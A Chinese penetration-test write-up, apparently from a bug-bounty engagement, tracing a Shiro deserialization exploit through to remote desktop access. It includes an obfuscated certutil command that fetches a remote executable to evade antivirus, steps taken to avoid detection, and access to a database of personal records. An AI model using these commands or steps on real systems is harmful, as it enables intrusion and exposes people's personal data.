記一次Shiro反序列化到遠程桌面
首先在奇安信hunter上搜索找到該SRC的有關資產(具體我就不放了),然后通過微步來搜索子域名找到今天的測試站點。
然后利用xray中檢測到該站點存在Shiro反序列化漏洞
于是考慮直接用feihong的反序列話工具,但是這次feihong的反序列化工具只檢測出key,gatget沒有檢測出來,咨詢了同事琛哥后,故考慮到是因為工具很久沒更新,需要找一條CB的鏈,啪的一下回車
直接開沖,先看下系統中是否存在殺毒軟件,一目了然,系統中存在火絨殺毒軟件。
在確定了目標系統存在火絨后我第一時間嘗試了hta上線,相關文章內容:記一次繞過火絨安全提權實戰案例
不過很可惜這個方法我在本地多次嘗試后發現火絨已經對這個方法進行了攔截和查殺。
后續和3h師傅交流應該是對文件的特征進行了查殺,不過也沒有在深一步探索繞過的方法。
題外話:這里測試的時候有一個小坑,感覺是工具的問題,工具在執行需要大量回顯的數據包時會卡死,需要重新啟動工具再執行一次命令才行。
這里繞過火絨選擇了certutil遠程下載方式,常規的cerutil直接下載肯定是不行的,于是想到了以前群里有師傅發過的變形版的certutil繞過方式。在本地測試后發現火絨沒有攔截該命令,此時激動的小手已經焦躁不安。
"c""e""r""t""u""t""i""l" -"u""r""l""c""a""c""h""e" -split -f https://url/1.exe 1.exe
題外話:發現目標系統不解析我vps的IP,搞得我晚上凌晨還在四處找人要VPS,感覺還是得隨時準備一臺國內的vps和國外的一臺vps。
在找到vps后,先在工具上ping了一下vps的IP地址
可以解析到ip美滋滋,不過在下載之前還是最好看看目標服務器最近的登陸時間,以免被發現
直接開沖,首先在vps上啟動一個臨時的python web,命令如下。
python -m SimpleHTTPServer 8888
然后先在本地測試一下,看看可不可以下載下來,OK,沒問題!
現在直接到工具中在目標系統上執行,成功落地到當前路徑下。
執行dir命令查看是否成功下載到當前目錄下
運行文件后上線
查看系統版本
因為是高版本所以獲取不到明文信息
所以還有兩個辦法去遠程連接, 一個是上傳遠控軟件,另外一個就是直接添加用戶。
先看第一個吧,使用截屏命令看看是否處于鎖屏狀態
由此可以判斷當前機器應該是在鎖屏中,所以這里只能我們自己添加一個用戶上去。因為機器中存在火絨,所以還需要bypass火絨添加用戶上去,方法我就暫時不放出來了(還請各位師傅見諒哈)
用戶加入完成后就可以進行遠程桌面連接了,這里為了避免機器告警,我們還需要把3389轉發出來。
現在即可進行連接了
然后進來后翻到了一個配置文件,里面有數據庫的信息
Mysql連接看看
隨便看一個表,好家伙,身份證,生日,姓名等等個人信息全部都有,就先不深入了,等進一步授權再搞。
